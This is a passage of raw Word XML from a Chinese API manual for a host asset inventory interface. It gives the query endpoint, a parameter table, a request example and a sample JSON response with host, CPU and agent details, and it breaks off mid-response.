        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EECEAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B823C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13402B44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC87FBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D91354" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用主机信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C77B05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7522C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA83647" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc115166087"/>
      <w:bookmarkStart w:id="26" w:name="主机信息查询结果"/>
      <w:r>
        <w:t>主机信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="5F3728E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询主机信息，按每台主机进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228B0A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D0FB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620C9A7"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640"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="624"/>
        <w:gridCol w:w="6481"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6096774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2E4F445" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747BC46B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2B3668" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D2FF3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E8B6F44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076A36B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C190C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDBDFA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A20272B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5352313A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56386AF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D6BF805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4216A870" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A48BB9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F593161" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13376B18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50143635" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32707BD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="204B2F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6584734C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC85BC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="707515B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CDF693" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36794623" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FB7A382" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2548087F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="577ABA77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A504844" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F114CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="577AEA80" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4308A46B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastOnlineTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D986FD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C0681B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40AA11D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后一次在线时间，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>yyyy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-MM-dd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HH:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mm:ss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>yyyy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-MM-dd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HH:mm:ss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CFA677C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21830D57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA3781B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="094371D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B71EF68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机状态，0-在线 1-离线 2-停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C33D38C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D60DFE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serialNumber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5879A0CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1A4E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053CE542" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>序列号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B4748AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBCBC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/host/linux?page=0&amp;size=50&amp;groups=1,2&amp;lastOnlineTime=2018-04-01 11:00:00 – 2018-04-01 16:00:00&amp;sorts=+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>hostname&amp;serialNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=VMware-56 4d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178523E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE2403" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"被删除分组",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"qingteng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxyIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>platform":"Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 16.04.2 LTS",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kernelVersion":"4.13.0-26-generic",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "core":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "producer":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenuineIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brand":"Intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(R) Core(TM) i5-7500 CPU @ 3.40GHz",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenuineIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4 Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loadAvgFifteen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0.35</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memoryUsage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memorySize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "onlineStatus":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentStatus":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastOnlineTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentVersion":"3.0.7-3.34.0-RC-Debug-2018-03-30_18-50-07-436",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bashVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bashPluginInstalled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>offlineDays</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chargeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wuhan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
